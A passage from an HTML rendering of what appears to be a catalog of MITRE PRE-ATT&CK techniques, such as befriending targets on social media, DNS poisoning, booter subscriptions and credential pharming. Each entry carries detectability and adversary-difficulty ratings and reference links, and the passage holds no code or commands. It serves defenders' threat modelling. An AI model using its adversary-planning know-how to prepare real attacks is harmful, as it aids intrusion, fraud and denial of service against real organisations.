<caption class="title">Table 1520. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1125">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1125</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_friend_follow_connect_to_targets_of_interest_pre_t1141"><a class="anchor" href="#_friend_follow_connect_to_targets_of_interest_pre_t1141"></a><a class="link" href="#_friend_follow_connect_to_targets_of_interest_pre_t1141">Friend/Follow/Connect to targets of interest - PRE-T1141</a></h3>
<div class="paragraph">
<p>A form of social engineering designed build trust and to lay the foundation for future interactions or attacks. (Citation: BlackHatRobinSage)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Users have the ability to detect and report non-authenticated individuals requesting to follow, friend or connect to a target. However the rigidity in validating the users is not typically followed by standard users.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Connecting with "friends" is a fundamental requirement for social media - without it, social media is worthless. An adversary can easily create a profile and request targets to validate the requests.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1521. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1141">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1141</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_create_infected_removable_media_pre_t1132"><a class="anchor" href="#_create_infected_removable_media_pre_t1132"></a><a class="link" href="#_create_infected_removable_media_pre_t1132">Create infected removable media - PRE-T1132</a></h3>
<div class="paragraph">
<p>Use of removable media as part of the Launch phase requires an adversary to determine type, format, and content of the media and associated malware. (Citation: BadUSB)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Adversary will likely use code repositories, but development will be performed on their local systems.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Several exploit repositories and tool suites exist for re-use and tailoring.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1522. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1132">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1132</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dns_poisoning_pre_t1159"><a class="anchor" href="#_dns_poisoning_pre_t1159"></a><a class="link" href="#_dns_poisoning_pre_t1159">DNS poisoning - PRE-T1159</a></h3>
<div class="paragraph">
<p>DNS (cache) poisoning is the corruption of an Internet server&#8217;s domain name system table by replacing an Internet address with that of another, rogue address. When a Web user seeks the page with that address, the request is redirected by the rogue entry in the table to a different address. (Citation: Google DNS Poisoning) (Citation: DNS Poisoning China) (Citation: Mexico Modem DNS Poison)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Partial</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Tracking multiple DNS infrastructures will likely require multiple tools/services, more advanced analytics, and mature detection/response capabilities in order to be effective. Few defenders demonstrate the mature processes to immediately detect and mitigate against the use of this technique.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Adversary poisons DNS entry to redirect traffic designated for one site to route to an adversary controlled resource.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1523. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1159">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1159</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_web_defensive_services_pre_t1033"><a class="anchor" href="#_identify_web_defensive_services_pre_t1033"></a><a class="link" href="#_identify_web_defensive_services_pre_t1033">Identify web defensive services - PRE-T1033</a></h3>
<div class="paragraph">
<p>An adversary can attempt to identify web defensive services as [<a href="https://www.cloudflare.com/" class="bare">https://www.cloudflare.com/</a> CloudFlare], [<a href="https://github.com/jjxtra/Windows-IP-Ban-Service" class="bare">https://github.com/jjxtra/Windows-IP-Ban-Service</a> IPBan], and [<a href="https://www.snort.org/" class="bare">https://www.snort.org/</a> Snort]. This may be done by passively detecting services, like [<a href="https://www.cloudflare.com/" class="bare">https://www.cloudflare.com/</a> CloudFlare] routing, or actively, such as by purposefully tripping security defenses. (Citation: NMAP WAF NSE)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Active service detection may trigger an alert. Passive service enumeration is not detected.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Adversary can passively detect services (e.g., [<a href="https://www.cloudflare.com/" class="bare">https://www.cloudflare.com/</a> CloudFlare] routing) or actively detect services (e.g., by purposefully tripping security defenses)</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1524. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1033">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1033</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_analyze_architecture_and_configuration_posture_pre_t1065"><a class="anchor" href="#_analyze_architecture_and_configuration_posture_pre_t1065"></a><a class="link" href="#_analyze_architecture_and_configuration_posture_pre_t1065">Analyze architecture and configuration posture - PRE-T1065</a></h3>
<div class="paragraph">
<p>An adversary may analyze technical scanning results to identify weaknesses in the configuration or architecture of a victim network. These weaknesses could include architectural flaws, misconfigurations, or improper security controls. (Citation: FireEyeAPT28)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: This can be done offline after the data has been collected.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Many of the common tools highlight these weakness automatically.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1525. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1065">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1065</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1084"><a class="anchor" href="#_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1084"></a><a class="link" href="#_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1084">Acquire and/or use 3rd party infrastructure services - PRE-T1084</a></h3>
<div class="paragraph">
<p>A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: 3rd party services highly leveraged by legitimate services, hard to distinguish from background noise. While an adversary can use their own infrastructure, most know this is a sure- re way to get caught. To add degrees of separation, they can buy or rent from another adversary or accomplice.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Wide range of 3rd party services for hosting, rotating, or moving C2, static data, exploits, exfiltration, etc.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1526. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1084">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1084</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_determine_approach_attack_vector_pre_t1022"><a class="anchor" href="#_determine_approach_attack_vector_pre_t1022"></a><a class="link" href="#_determine_approach_attack_vector_pre_t1022">Determine approach/attack vector - PRE-T1022</a></h3>
<div class="paragraph">
<p>The approach or attack vector outlines the specifics behind how the adversary would like to attack the target. As additional information is known through the other phases of PRE-ATT&amp;CK, an adversary may update the approach or attack vector. (Citation: CyberAdversaryBehavior) (Citation: WITCHCOVEN2015) (Citation: JP3-60) (Citation: JP3-12 &#174;) (Citation: DoD Cyber 2015)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. May change for special use cases or adversary and defender overlays.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1527. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1022">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1022</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_research_visibility_gap_of_security_vendors_pre_t1067"><a class="anchor" href="#_research_visibility_gap_of_security_vendors_pre_t1067"></a><a class="link" href="#_research_visibility_gap_of_security_vendors_pre_t1067">Research visibility gap of security vendors - PRE-T1067</a></h3>
<div class="paragraph">
<p>If an adversary can identify which security tools a victim is using they may be able to identify ways around those tools. (Citation: CrowdStrike Putter Panda)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Public source external to the defender&#8217;s organization.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Requires in-depth research and potentially other intrusions, requires unbounded amount of work to possibly find a return on investment</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1528. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1067">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1067</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_analyze_business_processes_pre_t1078"><a class="anchor" href="#_analyze_business_processes_pre_t1078"></a><a class="link" href="#_analyze_business_processes_pre_t1078">Analyze business processes - PRE-T1078</a></h3>
<div class="paragraph">
<p>Business processes, such as who typically communicates with who, or what the supply chain is for a particular part, provide opportunities for social engineering or other (Citation: Warwick2015)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Social engineering and other attempts to learn about business practices and processes would not immediately be associated with an impending cyber event.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: To get any kind of fidelity into business processes would require insider access. Basic processes could be mapped, but understanding where in the organization these processes take place and who to target during any given phase of the process would generally be difficult.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1529. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1078">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1078</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_assess_security_posture_of_physical_locations_pre_t1079"><a class="anchor" href="#_assess_security_posture_of_physical_locations_pre_t1079"></a><a class="link" href="#_assess_security_posture_of_physical_locations_pre_t1079">Assess security posture of physical locations - PRE-T1079</a></h3>
<div class="paragraph">
<p>Physical access may be required for certain types of adversarial actions. (Citation: CyberPhysicalAssessment) (Citation: CriticalInfrastructureAssessment)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Physical security is often unaware of implications of physical access to network. However, some organizations have thorough physical security measures that would log and report attempted incursions, perimeter breaches, unusual RF at a site, etc.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Social engineering and OSINT are still generally successful. Physical locations of offices/sites are easily determined. Monitoring for other sites of interest, such as backup storage vendors, is also easy to accomplish.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1530. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1079">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1079</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_obtain_booter_stressor_subscription_pre_t1173"><a class="anchor" href="#_obtain_booter_stressor_subscription_pre_t1173"></a><a class="link" href="#_obtain_booter_stressor_subscription_pre_t1173">Obtain booter/stressor subscription - PRE-T1173</a></h3>
<div class="paragraph">
<p>Configure and setup booter/stressor services, often intended for server stress testing, to enable denial of service attacks. (Citation: Krebs-Anna) (Citation: Krebs-Booter) (Citation: Krebs-Bazaar)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Purchase of booster services is not observable; potentially can trace booster service used to origin of sale, yet not before attack is executed. Furthermore, subscription does not automatically mean foul intention.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Easily accessible and used to launch DDoS attacks by even novice Internet users, and can be purchased from providers for a nominal fee, some of which even accept credit cards and PayPal payments to do.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1531. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1173">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1173</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_analyze_data_collected_pre_t1064"><a class="anchor" href="#_analyze_data_collected_pre_t1064"></a><a class="link" href="#_analyze_data_collected_pre_t1064">Analyze data collected - PRE-T1064</a></h3>
<div class="paragraph">
<p>An adversary will assess collected information such as software/hardware versions, vulnerabilities, patch level, etc. They will analyze technical scanning results to identify weaknesses in the confirmation or architecture. (Citation: SurveyDetectionStrategies) (Citation: CyberReconPaper) (Citation: RSA-APTRecon) (Citation: FireEyeAPT28)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: This can be done offline after the data has been collected.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Many of the common tools highlight these weaknesses automatically. Adversary can "dry run" against the target using known exploits or burner devices to determine key identifiers of software, hardware, and services.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1532. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1064">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1064</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_enumerate_externally_facing_software_applications_technologies_languages_and_dependencies_pre_t1038"><a class="anchor" href="#_enumerate_externally_facing_software_applications_technologies_languages_and_dependencies_pre_t1038"></a><a class="link" href="#_enumerate_externally_facing_software_applications_technologies_languages_and_dependencies_pre_t1038">Enumerate externally facing software applications technologies, languages, and dependencies - PRE-T1038</a></h3>
<div class="paragraph">
<p>Software applications will be built using different technologies, languages, and dependencies. This information may reveal vulnerabilities or opportunities to an adversary. (Citation: CommonApplicationAttacks) (Citation: WebApplicationSecurity) (Citation: SANSTop25)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Impossible to differentiate between an adversary and a normal user when accessing a site to determine the languages/technologies used. If active scanning tools are employed, then the defender has the ability to detect. However, this is typically not acted upon due to the large volume of this type of traffic and it will likely not prompt the defender to take any actionable defense. Defender review of access logs may provide some insight based on trends or patterns.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Basic interaction with the site provides insight into the programming languages/technologies used for a given web site. Additionally many of the active scanning tools will also provide some insight into this information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1533. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1038">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1038</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_generate_analyst_intelligence_requirements_pre_t1011"><a class="anchor" href="#_generate_analyst_intelligence_requirements_pre_t1011"></a><a class="link" href="#_generate_analyst_intelligence_requirements_pre_t1011">Generate analyst intelligence requirements - PRE-T1011</a></h3>
<div class="paragraph">
<p>Analysts may receive Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from leadership or key decision makers and generate intelligence requirements to articulate intricacies of information required on a topic or question. (Citation: Herring1999)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Normal aspect of adversary planning lifecycle. May not be done by all adversaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1534. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1011">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1011</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_port_redirector_pre_t1140"><a class="anchor" href="#_port_redirector_pre_t1140"></a><a class="link" href="#_port_redirector_pre_t1140">Port redirector - PRE-T1140</a></h3>
<div class="paragraph">
<p>Redirecting a communication request from one address and port number combination to another. May be set up to obfuscate the final location of communications that will occur in later stages of an attack. (Citation: SecureWorks HTRAN Analysis)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Infrastructure is (typically) outside of control/visibility of defender and as such as tools are staged for specific campaigns, it will not be observable to those being attacked.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [<a href="https://aws.amazon.com" class="bare">https://aws.amazon.com</a> AWS], VPS providers).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1535. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1140">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1140</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_business_processes_tempo_pre_t1057"><a class="anchor" href="#_identify_business_processes_tempo_pre_t1057"></a><a class="link" href="#_identify_business_processes_tempo_pre_t1057">Identify business processes/tempo - PRE-T1057</a></h3>
<div class="paragraph">
<p>Understanding an organizations business processes and tempo may allow an adversary to more effectively craft social engineering attempts or to better hide technical actions, such as those that generate network traffic. (Citation: Scasny2015) (Citation: Infosec-osint)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Current or previous employees may divulge information on the Internet. If insiders are used, the defender may have policies or tools in place to detect loss of this data or knowledge.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: In some cases, this requires some insider knowledge or specialized access to learn when critical operations occur in a corporation. For publicly traded US corporations, there is a lot of open source information about their financial reporting obligations (per SEC). Companies announce their annual shareholder meeting and their quarter phone calls with investors. Information such as this can help the adversary to glean certain aspects of the business processes and/or rhythm.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1536. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1057">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1057</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_build_and_configure_delivery_systems_pre_t1124"><a class="anchor" href="#_build_and_configure_delivery_systems_pre_t1124"></a><a class="link" href="#_build_and_configure_delivery_systems_pre_t1124">Build and configure delivery systems - PRE-T1124</a></h3>
<div class="paragraph">
<p>Delivery systems are the infrastructure used by the adversary to host malware or other tools used during exploitation. Building and configuring delivery systems may include multiple activities such as registering domain names, renting hosting space, or configuring previously exploited environments. (Citation: APT1)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: It is detectable once deployed to the public Internet, used for adversarial purposes, discovered, and reported to defenders.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: It is easy to create and burn infrastructure. Otherwise, blacklisting would be more successful for defenders.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1537. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1124">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1124</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_personnel_with_an_authority_privilege_pre_t1048"><a class="anchor" href="#_identify_personnel_with_an_authority_privilege_pre_t1048"></a><a class="link" href="#_identify_personnel_with_an_authority_privilege_pre_t1048">Identify personnel with an authority/privilege - PRE-T1048</a></h3>
<div class="paragraph">
<p>Personnel internally to a company may have non-electronic specialized access, authorities, or privilege that make them an attractive target for an adversary. One example of this is an individual with financial authority to authorize large transactions. An adversary who compromises this individual might be able to subvert large dollar transfers. (Citation: RSA-APTRecon)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: The layers of data required and potential gaps of information to map a specific person to an authority or privilege on a network requires access to resources that may not tip off a defender.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Requires an adversary to undergo an intensive research process. It is resource intensive or requires special data access. May be easier for certain specialty use cases.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1538. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1048">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1048</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mine_social_media_pre_t1050"><a class="anchor" href="#_mine_social_media_pre_t1050"></a><a class="link" href="#_mine_social_media_pre_t1050">Mine social media - PRE-T1050</a></h3>
<div class="paragraph">
<p>An adversary may research available open source information about a target commonly found on social media sites such as [<a href="https://www.facebook.com" class="bare">https://www.facebook.com</a> Facebook], [<a href="https://www.instagram.com" class="bare">https://www.instagram.com</a> Instagram], or [<a href="https://www.pinterest.com" class="bare">https://www.pinterest.com</a> Pinterest]. Social media is public by design and provides insight into the interests and potentially inherent weaknesses of a target for exploitation by the adversary. (Citation: RSA-APTRecon)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Searching publicly available sources that cannot be monitored by a defender.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Very public by design. Application of privacy settings is not a panacea.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1539. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1050">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1050</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_credential_pharming_pre_t1151"><a class="anchor" href="#_credential_pharming_pre_t1151"></a><a class="link" href="#_credential_pharming_pre_t1151">Credential pharming - PRE-T1151</a></h3>
<div class="paragraph">
<p>Credential pharming a form of attack designed to steal users' credential by redirecting users to fraudulent websites. Pharming can be conducted either by changing the hosts file on a victim&#8217;s computer or by exploitation of a vulnerability in DNS server software. (Citation: DriveByPharming) (Citation: GoogleDrive Phishing)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Fidelity of networking monitoring must be able to detect when traffic is diverted to non-normal sources at a site level. It is possible to identify some methods of pharming, but detection capabilities are limited and not commonly implemented.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Although it can be difficult to spoof/redirect content to a hostile service via DNS poisoning or MiTM attacks, current malware such as Zeus is able to successfully pharm credentials and end users are not well-versed in checking for certificate mismatches.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1540. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
